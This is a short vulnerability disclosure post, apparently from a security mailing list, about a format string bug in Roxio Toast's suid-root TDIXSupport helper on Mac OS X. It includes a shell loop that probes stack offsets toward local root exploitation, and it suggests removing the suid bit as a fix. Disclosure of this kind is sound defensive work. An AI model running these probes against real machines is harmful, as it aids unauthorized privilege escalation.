[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Possible local root vulnerability in Roxio Toast on Mac OS X

Possible local root vulnerability in Roxio Toast on Mac OS X
By fintler <fintler@xxxxxxxxx>


There is a format string bug in the binary (/Library/Application
Support/Roxio/TDIXSupport). It is installed suid root by default and
may be exploited by finding the offset and overwriting the stack with
malicious instructions.

fintler@haven:/Library/Application Support/Roxio$ ls -l TDIXSupport 
-rwsr-sr-x  1 root  wheel  14260  5 Nov  2003 TDIXSupport
fintler@haven:/Library/Application Support/Roxio$ ./TDIXSupport
kextload: /Library/Application
no such bundle file exists
can't add kernel extension /Library/Application
(file access/permissions) (run kextload on this kext with -t for
diagnostic output)
fintler@haven:/Library/Application Support/Roxio$
for((i=1;i<1000;i++));do echo -n "$i "&&./TDIXSupport
"AAAAAAAAAAAAAAAAAAAAAAA%$i\$x";done|grep 4141 2>/dev/null

A possible way of fixing this issue is to change the permissions of
the binary to non-suid root by issuing the following command:
'sudo chmod 0755 /Library/Application Support/Roxio/TDIXSupport'
This will most likely disable some functionality of Toast.